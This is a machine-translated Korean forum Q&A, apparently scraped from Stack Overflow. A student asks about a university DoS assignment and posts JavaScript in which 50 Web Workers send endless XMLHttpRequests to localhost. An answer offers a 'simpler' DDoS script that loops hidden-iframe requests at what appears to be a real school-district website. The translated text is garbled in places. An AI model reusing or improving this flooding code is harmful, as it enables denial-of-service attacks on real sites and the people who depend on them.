대학에서 WebWorkers

을 사용하여 JavaScript DoS 공격을 실시한 결과, 서비스 거부 공격을 시도하기위한 "숙제"가있었습니다. 나는 조금 다른 방식으로 가고 싶어한다. JavaScript를 사용하여 실행하려고했습니다.대학에서 WebWorkers

질문은 다음과 같습니다 그것도 가능 이것에

인가?
루프백에서 HttpRequest를 수행하면 http 포트가 넘쳐서 발생하는 모든 웹 사이트의 unaccesibility 결과가 표시됩니까?
광산보다 더 좋은 코드가 있습니까?

index.html을 :

<script> 
    for(var i = 0; i< 50; i++) { 
     worker = new Worker("worker.js"); 
     worker.postMessage('Hello World'); 
    } 
</script>

worker.js :

self.addEventListener('message', function(e) { 
    while(1) { 
      var xmlHttp = new XMLHttpRequest(); 
      xmlHttp.onreadystatechange = function() { 
      if (xmlHttp.readyState == 4 && xmlHttp.status == 200) 
        callback(xmlHttp.responseText); 
      } 
      xmlHttp.open("GET", "http://127.0.0.1", true); 
      xmlHttp.send(null); 
    } 
}, false);

는 모든 입력 주셔서 감사합니다!

출처

2017-04-01 TomasB

잘 모르겠어요하지만 원격 서버보다 자신의 컴퓨터를 충돌 할 가능성이 높습니다를 찾을 수 '(1)' – mehulmpt

코드를 실행했을 때 무슨 일이 일어 났습니까? 브라우저가'while (1)'으로 멋 있었습니까? – nnnnnn

@nnnnnn 웹 작업자가 장면 뒤에서 모든 작업을 수행했기 때문에 브라우저가 정상적으로 보였습니다. 개발자 도구에서 요청이 전송되고 있음을 명확하게 볼 수 있지만 원하는 웹 사이트로 이동할 수는 있습니다. – TomasB

-1

우선이 코드를 개선 할 수 있으면 while (1) 대신 setInterval을 사용합니다. 둘째, 나는 여기에 훨씬 간단 버전을 발견 (있는 경우

function _DDoS(url){ 
    document.body.innerHTML+='<iframe src="'+url+'" style="display:none;"> </iframe>'; 
} 
for(;;){ 
setTimeout(_DDoS("http://www.mvcsc.k12.in.us"),10); 
}

는 자바 스크립트 DDOS를 검색하면 많은 예

출처

2017-05-15 21:10:47

답변

관련 문제